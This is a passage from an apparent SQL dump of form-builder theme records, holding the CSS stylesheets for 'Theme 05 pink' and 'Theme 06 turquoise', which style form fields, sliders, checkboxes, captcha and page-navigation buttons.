vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(19,'Theme 05 pink','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #B05785;\r\nborder: 1px solid #F6E2ED;\r\nmargin-bottom: 10px;\r\ncolor: #F6E2ED;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 14px;\r\n	height: 14px;\r\n	top: -6px;\r\n	border: 2px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #fff !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n	content: url([SITE_ROOT]/images/05/03/nextbg_hover.png) url([SITE_ROOT]/images/05/03/previousbg_hover.png);\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #B05785 !important;\r\n	color: #fff;\r\noutline:none;\r\n}\r\nui-state-hover {\r\n	background: #B05785 !important;\r\n	color: #fff;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\nborder-radius: 0px;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #E5E5E5 !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 2px;\r\n	font-size: 13px;\r\n	height: 20px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: #fff;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 22px;\r\n	width: 27px;\r\n	background: url([SITE_ROOT]/images/05/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 41px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/05/02/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/03/nextbg.png) no-repeat;\r\n	padding: 0px 20px 0 0;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/03/nextbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 32px;\r\n	line-height: 28px;\r\n	background: url([SITE_ROOT]/images/05/03/previousbg.png) no-repeat;\r\n	padding: 0px 0 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	width: 90px;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/05/03/previousbg_hover.png) no-repeat;\r\n	width: 113px;\r\n}\r\n.button-submit {\r\n	background: url([SITE_ROOT]/images/05/03/submit.png) no-repeat;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 32px;\r\n	color: #fff;\r\n	margin: 5px;\r\n	border: 0px;\r\n	font-family: Segoe UI;\r\n	font-weight: 500;\r\n	padding: 0 12px 0 24px;\r\n}\r\n.button-reset {\r\n	background: transparent;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	min-width: 80px;\r\n	min-height: 34px;\r\n	color: #787878;\r\n	border: 0px;\r\n	margin: 5px;\r\n	font-family: Segoe UI;\r\n	text-decoration: underline;\r\n}\r\n.wdform_page {\r\n	background: #F6E2ED;\r\n	padding: 15px 20px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform-field-section-break {\r\n	text-align: center;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 0px;\r\n	background: #B05785;\r\n	border-radius: 0px;\r\npadding: 6px 10px 15px;\r\ntext-align: center;\r\nfont-size: 18px;\r\ncolor: #fff;\r\nbox-shadow: 0px 3px 5px #4B4B4B;\r\n}\r\n\r\n.wdform-field-section-break2:after {\r\n	content: \" \";\r\n	position: relative;\r\n	width: 97.7%;\r\n	right: 0px;\r\n	bottom: 20px;\r\n	height: 4px;\r\n	-webkit-box-shadow: 0 2px 3px #444141;\r\n	-moz-box-shadow: 0 2px 3px #444141;\r\n	box-shadow: 0 2px 3px #444141;\r\n	display: inline-block;\r\n\r\n}\r\n\r\n.wdform_section_break {\r\n	margin: 16px 0px;\r\n	border-radius: 0px;\r\n	text-align: left;\r\nfont-size: 18px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\nborder: 1px solid transparent;\r\n	padding: 2px;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"password\"]{\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	border: 1px solid transparent;\r\n	height: 20px;\r\n	padding:0 3px !important;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border: 1px solid #B05785;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border: 1px solid #B05785;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #B05785;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #B05785;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/05/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 21px;\r\n	position: relative;\r\n	left: -19px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #B05785;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #B05785;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #D7639F;\r\n	margin-left: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #E47DB3;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-left: 1px;\r\n	line-height: 25px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 27px;\r\n	line-height: 27px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #D863A0 ;\r\n	background: -moz-linear-gradient(left, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #D7639F ), color-stop(39%, #D863A0 ), color-stop(100%, #F173B4 ));\r\n	background: -webkit-linear-gradient(left, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\n	background: -o-linear-gradient(left, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\n	background: -ms-linear-gradient(left, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\nbackground: linear-gradient(to right, #D7639F 0%, #D863A0 39%, #F173B4 100%);\r\n	border-top-right-radius: 9px;\r\n	border-bottom-right-radius: 9px;\r\n	box-shadow: 2px 0px 7px #9E9B9B;\r\n}\r\n.page_percentage_deactive {\r\n	height: 27px;\r\n	line-height: 27px;\r\n	background-color: #D6CAD2;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #6E6E6E;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 27px;\r\n	height: 27px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}',0),(20,'Theme 06 turquoise','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #B1EBE9;\r\nborder: 1px solid #018580;\r\nmargin-bottom: 10px;\r\ncolor: #018580;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #029A95 !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0% 50%;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page\r\n{\r\n        width:inherit !important;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/06/next.png) no-repeat right #019993;\r\n 	padding: 0px 36px 0 20px ;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #018580;\r\n\r\n}\r\n.next-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/next.png) no-repeat right #00C5BD;\r\n}\r\n.previous-page\r\n{\r\n        width:inherit !important;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.previous-page div.wdform-page-button:before {\r\n	content: 